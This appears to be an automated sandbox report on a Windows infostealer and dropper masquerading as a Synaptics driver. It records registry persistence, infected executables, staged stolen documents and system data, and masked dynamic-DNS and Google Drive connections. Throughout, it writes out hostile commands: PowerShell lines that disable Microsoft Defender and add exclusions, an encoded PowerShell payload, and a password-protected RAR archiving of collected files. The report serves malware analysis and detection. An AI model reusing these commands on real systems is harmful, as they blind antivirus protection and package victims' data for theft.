Technical Information
To ensure autorun and distribution
Modifies the following registry keys
- [HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run] 'Synaptics Pointing Device Driver' = '%ALLUSERSPROFILE%\Synaptics\Synaptics.exe'
Infects the following executable files
- %HOMEPATH%\desktop\tcm851ax32.exe
- %HOMEPATH%\desktop\utorrent.exe
Malicious functions
To complicate detection of its presence in the operating system,
adds antivirus exclusion:
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath '%TEMP%\Built.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -Enabl...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath '%ALLUSERSPROFILE%\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
Reads files which store third party applications passwords
- %HOMEPATH%\desktop\508softwareandos.doc
- %HOMEPATH%\desktop\adhd_and_obesity.docx
- %HOMEPATH%\desktop\fi51.doc
- %HOMEPATH%\desktop\hadac_newsletter_july_2010_final.docx
- %HOMEPATH%\desktop\holycrosschurchinstructions.docx
- %HOMEPATH%\desktop\ovp25012015.doc
- %HOMEPATH%\desktop\thlps_keeper_mayer_1965.docx
Modifies file system
Creates the following files
- %TEMP%\_mei15602\vcruntime140.dll
- %TEMP%\okksll14\okksll14.0.cs
- %TEMP%\ В \system\antivirus.txt
- %TEMP%\ В \common files\desktop\thlps_keeper_mayer_1965.docx
- %TEMP%\ В \common files\desktop\ovp25012015.doc
- %TEMP%\ В \common files\desktop\holycrosschurchinstructions.docx
- %TEMP%\ В \common files\desktop\hadac_newsletter_july_2010_final.docx
- %TEMP%\ В \common files\desktop\fi51.doc
- %TEMP%\okksll14\okksll14.cmdline
- %TEMP%\ В \common files\desktop\adhd_and_obesity.docx
- %ALLUSERSPROFILE%\microsoft\windows\start menu\programs\startup\ .scr
- %TEMP%\_mei37442\unicodedata.pyd
- %TEMP%\_mei37442\sqlite3.dll
- %TEMP%\_mei37442\skoch.aes
- %TEMP%\_mei37442\select.pyd
- %TEMP%\_mei37442\rarreg.key
- %TEMP%\_mei37442\rar.exe
- %TEMP%\ В \common files\desktop\508softwareandos.doc
- %TEMP%\okksll14\okksll14.out
- %TEMP%\okksll14\cscde6c175e97d42249fad923f8c7e68c.tmp
- %TEMP%\res8a7d.tmp
- %TEMP%\ В \system\mac addresses.txt
- %WINDIR%\softwaredistribution\sls\8b24b027-1dee-babb-9a95-3517dfb9c552\tmpb7d9.tmp
- %WINDIR%\softwaredistribution\sls\8b24b027-1dee-babb-9a95-3517dfb9c552\sls.cab
- %TEMP%\ В \system\system info.txt
- %WINDIR%\softwaredistribution\sls\855e8a7c-ecb4-4ca3-b045-1dfa50104289\tmpafc9.tmp
- %WINDIR%\softwaredistribution\sls\855e8a7c-ecb4-4ca3-b045-1dfa50104289\sls.cab
- %WINDIR%\softwaredistribution\sls\9482f4b4-e343-43b6-b170-9a65bc822c77\tmpa8c3.tmp
- %WINDIR%\softwaredistribution\sls\9482f4b4-e343-43b6-b170-9a65bc822c77\sls.cab
- %TEMP%\ В \directories\downloads.txt
- %TEMP%\ В \directories\videos.txt
- %TEMP%\ В \directories\music.txt
- %TEMP%\ В \directories\documents.txt
- %TEMP%\ В \directories\pictures.txt
- %TEMP%\ В \directories\desktop.txt
- %TEMP%\mmk9zv9.ini
- %TEMP%\ В \display (1).png
- %TEMP%\okksll14\okksll14.dll
- %TEMP%\_mei37442\python311.dll
- %TEMP%\ В \system\task list.txt
- %TEMP%\_mei37442\libssl-1_1.dll
- %TEMP%\_mei37442\libcrypto-1_1.dll
- %TEMP%\fuetvrk4.exe
- %ALLUSERSPROFILE%\synaptics\rcx76fa.tmp
- %ALLUSERSPROFILE%\synaptics\synaptics.exe
- %TEMP%\tmpgtjhhw28\._cache_tool.exe
- %TEMP%\tmpgtjhhw28\tool.exe
- %TEMP%\nur8cw6_
- %TEMP%\_mei15602\unicodedata.pyd
- %TEMP%\rcx7f66.tmp
- %TEMP%\_mei15602\select.pyd
- %TEMP%\_mei15602\libcrypto-1_1.dll
- %TEMP%\_mei15602\base_library.zip
- %TEMP%\_mei15602\_socket.pyd
- %TEMP%\_mei15602\_lzma.pyd
- %TEMP%\_mei15602\_hashlib.pyd
- %TEMP%\_mei15602\_decimal.pyd
- %TEMP%\_mei15602\_bz2.pyd
- %TEMP%\_mei15602\python311.dll
- %TEMP%\fuetvrk4.ico
- %TEMP%\rcx7fb6.tmp
- %TEMP%\kfytu1q4.exe
- %TEMP%\_mei37442\base_library.zip
- %TEMP%\_mei37442\_ssl.pyd
- %TEMP%\_mei37442\_sqlite3.pyd
- %TEMP%\_mei37442\_socket.pyd
- %TEMP%\_mei37442\_queue.pyd
- %TEMP%\_mei37442\_lzma.pyd
- %TEMP%\_mei37442\_hashlib.pyd
- %TEMP%\_mei37442\_decimal.pyd
- %TEMP%\_mei37442\_ctypes.pyd
- %TEMP%\_mei37442\_bz2.pyd
- %TEMP%\_mei37442\vcruntime140.dll
- %LOCALAPPDATA%\microsoft\clr_v4.0\usagelogs\._cache_tool.exe.log
- %TEMP%\server.exe
- %TEMP%\built.exe
- %TEMP%\rcx80c1.tmp
- %TEMP%\kfytu1q4.ico
- %TEMP%\rcx8072.tmp
- %TEMP%\_mei37442\libffi-8.dll
- %TEMP%\rvxy1.zip
Sets the 'hidden' attribute to the following files
- %TEMP%\tmpgtjhhw28\._cache_tool.exe
- %ALLUSERSPROFILE%\synaptics\synaptics.exe
Moves the following files
- from %ALLUSERSPROFILE%\synaptics\rcx76fa.tmp to %ALLUSERSPROFILE%\synaptics\synaptics.exe
- from %TEMP%\rcx7f66.tmp to %TEMP%\fuetvrk4.exe
- from %TEMP%\rcx7fb6.tmp to %TEMP%\fuetvrk4.exe
- from %TEMP%\rcx8072.tmp to %TEMP%\kfytu1q4.exe
- from %TEMP%\rcx80c1.tmp to %TEMP%\kfytu1q4.exe
Modifies the following files
- %LOCALAPPDATA%\microsoft\windows\explorer\thumbcache_idx.db
Network activity
Connects to
- 'fr####s.afraid.org':80
- 'gs##tic.com':443
- 'docs.google.com':443
- 'drive.usercontent.google.com':443
TCP
HTTP GET requests
- http://fr####s.afraid.org/api/?ac###########################################################
- http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?29##############
Other
- 'gs##tic.com':443
- 'docs.google.com':443
- 'drive.usercontent.google.com':443
UDP
- DNS ASK xr##.mooo.com
- DNS ASK fr####s.afraid.org
- DNS ASK gs##tic.com
- DNS ASK docs.google.com
- DNS ASK settings-win.data.microsoft.com
- DNS ASK drive.usercontent.google.com
Miscellaneous
Searches for the following windows
- ClassName: 'OleMainThreadWndClass' WindowName: ''
- ClassName: 'MS_WINHELP' WindowName: ''
Creates and executes the following
- '%TEMP%\tmpgtjhhw28\tool.exe'
- '%TEMP%\tmpgtjhhw28\._cache_tool.exe'
- '%ALLUSERSPROFILE%\synaptics\synaptics.exe' InjUpdate
- '%TEMP%\built.exe'
- '%TEMP%\server.exe'
- '%TEMP%\_mei37442\rar.exe' a -r -hp"skoch" "%TEMP%\RVxY1.zip" *
Restarts the analyzed sample
Executes the following
- '<SYSTEM32>\fondue.exe' /enable-feature:NetFx3 /caller-name:mscoreei.dll
- '<SYSTEM32>\cmd.exe' /c "wmic csproduct get uuid"
- '<SYSTEM32>\wbem\wmic.exe' computersystem get totalphysicalmemory
- '<SYSTEM32>\cmd.exe' /c "wmic computersystem get totalphysicalmemory"
- '<SYSTEM32>\wbem\wmic.exe' os get Caption
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\_MEI37442\rar.exe a -r -hp"skoch" "%TEMP%\RVxY1.zip" *"
- '<SYSTEM32>\wbem\wmic.exe' path win32_shortcutfile where name="C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Telegram Desktop\\Telegram.lnk" get target /value
- '<SYSTEM32>\getmac.exe'
- '<SYSTEM32>\cmd.exe' /c "getmac"
- '%WINDIR%\microsoft.net\framework64\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES8A7D.tmp" "%TEMP%\okksll14\CSCDE6C175E97D42249FAD923F8C7E68C.TMP"
- '<SYSTEM32>\systeminfo.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Get-Clipboard
- '<SYSTEM32>\wbem\wmic.exe' /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
- '<SYSTEM32>\cmd.exe' /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
- '<SYSTEM32>\wbem\wmic.exe' csproduct get uuid
- '%WINDIR%\microsoft.net\framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @"%TEMP%\okksll14\okksll14.cmdline"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
- '<SYSTEM32>\cmd.exe' /c "powershell -Command Add-MpPreference -ExclusionPath '%ALLUSERSPROFILE%\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
- '<SYSTEM32>\cmd.exe' /c "tree /A /F"
- '<SYSTEM32>\cmd.exe' /c "systeminfo"
- '<SYSTEM32>\wbem\wmic.exe' path win32_VideoController get name
- '<SYSTEM32>\cmd.exe' /c "powershell Get-Clipboard"
- '<SYSTEM32>\cmd.exe' /c "wmic path win32_shortcutfile where name="C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Telegram Desktop\\Telegram.lnk" get target /value"
- '<SYSTEM32>\cmd.exe' /c "tasklist /FO LIST"
- '<SYSTEM32>\cmd.exe' /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
- '<SYSTEM32>\cmd.exe' /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess ...
- '<SYSTEM32>\cmd.exe' /c "powershell -Command Add-MpPreference -ExclusionPath '%TEMP%\Built.exe'"
- '<SYSTEM32>\cmd.exe' /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbAB...
- '<SYSTEM32>\tree.com' /A /F
- '<SYSTEM32>\tasklist.exe' /FO LIST
- '<SYSTEM32>\cmd.exe' /c "wmic os get Caption"
- '<SYSTEM32>\cmd.exe' /c "wmic path win32_VideoController get name"
- '<SYSTEM32>\cmd.exe' /c "wmic path win32_VideoController get name"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES8A7D.tmp" "%TEMP%\okksll14\CSCDE6C175E97D42249FAD923F8C7E68C.TMP"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "powershell -Command Add-MpPreference -ExclusionPath '%TEMP%\Built.exe'"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess ...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "wmic csproduct get uuid"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @"%TEMP%\okksll14\okksll14.cmdline"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "powershell -Command Add-MpPreference -ExclusionPath '%ALLUSERSPROFILE%\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "getmac"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "tree /A /F"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "wmic os get Caption"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbAB...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "wmic path win32_shortcutfile where name="C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Telegram Desktop\\Telegram.lnk" get target /value"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "powershell Get-Clipboard"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "tasklist /FO LIST"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "wmic computersystem get totalphysicalmemory"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "systeminfo"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\_MEI37442\rar.exe a -r -hp"skoch" "%TEMP%\RVxY1.zip" *"' (with hidden window)
